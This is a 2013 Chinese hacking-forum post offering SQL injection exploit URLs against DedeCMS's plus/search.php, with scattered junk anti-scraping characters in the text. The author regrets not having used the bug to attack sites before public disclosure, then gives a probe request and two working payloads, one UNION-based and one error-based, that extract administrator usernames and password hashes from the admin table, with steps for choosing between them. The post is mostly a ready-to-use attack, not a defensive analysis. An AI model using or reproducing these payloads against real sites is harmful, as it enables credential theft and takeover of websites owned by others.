找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1912|回复: 0
打印 上一主题 下一主题

[通杀]dedecms plus/search.php 注入漏洞利用EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-21 08:45:22 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
转载不加作者名的没JJ% `6 _, y" V1 l3 i6 Z* W
" o2 d+ s+ Z8 H
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。" z/ J4 }) b: T+ L5 G+ u

0 N9 E& \  O8 l# F* D$ ]8 O既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
- O% k1 W$ O0 E$ K: Z$ M" K
3 W, \7 Q# X# h: t3 l6 J3 f/ B我一般是这样测试的:
. z+ w) F! K0 G) x7 ]+ k7 }* \" b8 P% A) X8 y
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a& B3 |. x) M8 W$ o3 U1 I* W

% ]& A$ ?- \9 T! A" }转载不加作者名的没JJ2 x( E6 \3 L# z& O+ y
: }  }4 G2 M; W# k  ?/ d% b  o5 _# w
作者:鬼哥
! ?" k8 N1 y& r1 z" U, c/ ]* D1 ]- d& {) Z! @
: Q  ?4 U( `6 u; N# W
. g# O( s; {  C9 J
看结果如果提示( Q, H, d) Y  q, q0 e1 r

  p! y0 g8 b% g6 G; vSafe Alert: Request Error step 2 !  c- G) ]8 c9 M1 v, `: M: K6 |
) J* s* K7 n, V9 Z6 p( t
那么直接用下面的exp
! ]" t% X: G1 g) i6 U0 T
* \0 X  b- t- pxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
8 ]8 Y" p0 o% B9 h3 Y1 s, D- J9 K2 q7 }0 o
7 p; v1 J8 {5 C# k  `
看结果如果提示
4 ~; G# i5 K. Q# [' m' u! S1 Q
( }- _# F7 j: S1 P, LSafe Alert: Request Error step 1 !+ H# _  C# R& V# N  i
/ `9 ?" s' z0 n+ P
那么直接用下面的exp
7 E/ E9 W5 O: k9 M4 I+ q3 u, U( H8 i% a! D7 b9 |- o
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
- n9 ?1 z5 t; k% K: b- ^
, `8 d4 C8 b( w# p( n7 d2 [7 u1 ^. V6 V$ U  l" h2 @9 }/ K& H; q* t
如果正常显示证明漏洞不存在了。
5 \( @6 e( }1 l; H1 }0 E$ V" X$ y9 K; U7 z9 i
转载不加作者名的没JJ
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表